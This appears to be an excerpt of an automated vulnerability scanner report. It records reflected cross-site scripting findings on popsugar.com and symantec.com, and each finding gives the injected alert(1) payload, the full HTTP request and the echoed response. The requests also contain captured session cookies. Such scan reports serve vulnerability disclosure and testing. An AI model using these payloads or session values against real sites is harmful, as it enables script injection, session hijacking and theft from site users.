GET /ajaxharness1274b"-alert(1)-"faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 216634
Date: Mon, 12 Sep 2011 12:48:06 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831686%7CpkptR%2FA9J%2FIqOT1%2FNXZ2n3QzQ3z9KzL8JzqNOXzhPCUOXdBu6NS1b%2F3LUa8GKOLImxVmk7YfvLibUFzSqe5Q%2B7%2BoVuuMa7MtnWxeLZvLkI0rcDOFt58RkZNzXW2qbFry5plWRfKYqFDBw4BBEwsyl3s5Am93doYXCHQyo1EcDOCL1roLiKJwo2kG02GMlhGxN7k3D4PUL585q5xETKDblw%3D%3D%7C429f67101424c290012240d8a56cca4712884354; expires=Wed, 05-Oct-2011 16:21:26 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/ajaxharness1274b"-alert(1)-"faa5baba69b",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.133. http://www.popsugar.com/community/welcome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71fc3"-alert(1)-"b26aaabc6d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community71fc3"-alert(1)-"b26aaabc6d1/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 214880
Date: Mon, 12 Sep 2011 12:48:13 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831693%7Cr9dhWypY6jg0x26vr4FaUOqhCsFOKHx5a%2Bq2ZDd%2BTfxw08HKOoJMNBXIB2hhcFDYnBzwi8s3IVNfYgNmYEw%2BLksmQfw08uQ6pxsGEBhnj9JcmGg5BFRhwDUwk88E51%2BnDwBluagi98uxF2qU8Lcnq%2BREdgQf3pT2oh7xtrjQAcl9H8hYmTA%2FNyOK2rW22dQT%2B5nTWh2raVfAbMmHLd%2Fk%2BQ%3D%3D%7C7aa075b627ef874e5acd15c901cd009ba793cf8b; expires=Wed, 05-Oct-2011 16:21:33 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community71fc3"-alert(1)-"b26aaabc6d1/welcome",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.134. http://www.popsugar.com/community/welcome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dc10"><script>alert(1)</script>52e78853112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community8dc10"><script>alert(1)</script>52e78853112/welcome HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web019-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 215025
Date: Mon, 12 Sep 2011 12:48:11 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831691%7CEDANpUBXj7Tgv43AmGrEhzEQXWyNeG0H2zRof%2FnyvlEl%2BPoC%2FCdYmxgnkumTYWRDyf16qQRZZWKmfWgsLDfCNJztLyezVjGPrXBnIdPU%2FijnixGFkQYw17y9MdoPtfcAKuYEXGj1y6pmNeONBafiaAclYS69eompF4MBmzqpl6ELuA2SXF9YYcuAaG5rOfCALG8nlaGApmcVl%2FDZLDHLpw%3D%3D%7Cdc8ded20b853356648daf3e5c9a44561e3044fcd; expires=Wed, 05-Oct-2011 16:21:31 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community8dc10"><script>alert(1)</script>52e78853112/welcome">
...[SNIP]...

2.135. http://www.popsugar.com/community/welcome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9aea"-alert(1)-"a554c76626d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/welcomef9aea"-alert(1)-"a554c76626d HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 149935
Date: Mon, 12 Sep 2011 12:49:00 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831740%7CPBu6CHBL%2BNPiJ%2BO0b88VGrbPoavruFNqnmlHvuiyu5RAZ8RbrX4MARzW6UPUI4XAzUuUWIKcevcUd75sOIG7vbWCJmfKPIEgOL7cKSF5iS4%2FtvU79e%2BjOKK3juIM7eHeBEDUqSSYOB%2Bm3H7BlJevZtX6AFsSQFzsbM7h9PjEi57L3o59zDb70XFiwzNQNbEBhkqvX%2F5U2G%2B34iy8gxYO4g%3D%3D%7C6dabb54501a683def6c8a84c7f24d6fa0e681d28; expires=Wed, 05-Oct-2011 16:22:20 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<script>
var comscoreHash = "7c5700a02ac753aeb1b48be93ede5569";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.popsugar.com/community/welcomef9aea"-alert(1)-"a554c76626d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.136. http://www.popsugar.com/community/welcome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /community/welcome

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e939"><script>alert(1)</script>5f0bb92b79e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/welcome4e939"><script>alert(1)</script>5f0bb92b79e HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 150250
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831703%7CoAutIUEcXq6bCNfw74vX3a0be04ZbR4xtUo1MkM2Wd11jXYyJcUAEBZW4wg1XBM9frctMhBcgKvcWELTBl%2FmSMz8iU8UXP3HuedsTL3oNeYUELTy8uSkwVNdGNj8TtYYoOq1UoQzUrLsQjAK6FKYwd2IUdA5MzeD0wF3ZgDFwzcJUej1ChSFZzPRc1Svasm3z2LxMdUMOWcSToydDAcpMg%3D%3D%7Cce8ce4960372de566ad8f2cb9b30c00a80876c77; expires=Wed, 05-Oct-2011 16:21:43 GMT; path=/; httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbm
...[SNIP]...
<link rel="canonical" href="http://www.popsugar.com/community/welcome4e939"><script>alert(1)</script>5f0bb92b79e">
...[SNIP]...

2.137. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de3fe'-alert(1)-'2de55c2ee7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:14 +0000
Vary: Cookie
ETag: "1315831694"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777241
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesde3fe'-alert(1)-'2de55c2ee7c/default/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.138. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85ada'-alert(1)-'a74af1a6694 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:18 +0000
Vary: Cookie
ETag: "1315831698"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777346
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default85ada'-alert(1)-'a74af1a6694/themes/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.139. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b374'-alert(1)-'f947be7dc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:22 +0000
Vary: Cookie
ETag: "1315831702"
Content-Type: text/html; charset=utf-8
Content-Length: 29494
X-Varnish: 1371255077
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes4b374'-alert(1)-'f947be7dc9/connect2/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.140. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e5b9'-alert(1)-'74a67864f83 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:28 +0000
Vary: Cookie
ETag: "1315831708"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777530
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect28e5b9'-alert(1)-'74a67864f83/images/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.141. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d05b9'-alert(1)-'cfeabf464ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:32 +0000
Vary: Cookie
ETag: "1315831712"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777597
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/imagesd05b9'-alert(1)-'cfeabf464ec/favicon.ico';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.142. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69951'-alert(1)-'8f65520acae was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites/default/themes/connect2/images/favicon.ico69951'-alert(1)-'8f65520acae HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20event69%3Devent69%7C1336358498621%3B%20s_nr%3D1315849701394-Repeat%7C1336585701394%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:48:36 +0000
Vary: Cookie
ETag: "1315831716"
Content-Type: text/html; charset=utf-8
Content-Length: 29495
X-Varnish: 1923777663
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=1800
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
